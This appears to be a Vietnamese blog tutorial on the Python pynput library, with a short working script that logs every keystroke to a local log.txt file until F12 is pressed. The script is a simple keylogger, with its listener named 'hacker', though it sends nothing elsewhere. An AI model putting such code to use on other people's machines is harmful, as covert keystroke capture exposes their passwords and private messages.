Ghi lại bàn phím và chuột máy tính với thư viện pynput trong Python

Thư viện pynput cho phép bạn điều khiển và giám sát các thiết bị đầu vào. Hiện tại, đầu vào và giám sát bằng chuột và bàn phím được hỗ trợ. Để cài đặt thư viện này bạn gõ lênh: pip install pynput

Xem tại đây để biết tài liệu đầy đủ. Sau đây là ví dụ về cách ghi lại bàn phím và lưu vào tệp log.txt cùng thư mục với tệp main.py của chương trình Python.

from pynput.keyboard import Listener

def anonymous(key):
  key = str(key)
  if key == "Key.f12":
    raise SystemExit(0)
  if key == "Key.ctrl_l":
    key = ""
  if key == "Key.enter":
    key = "\n"
  with open("log.txt", "a") as file:
    file.write(key)

with Listener(on_press=anonymous) as hacker:
  hacker.join()

Khi chương trình trên chạy sẽ tiến hành lưu lại tất cả các phím đã nhấn và lưu vào tệp log.txt.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *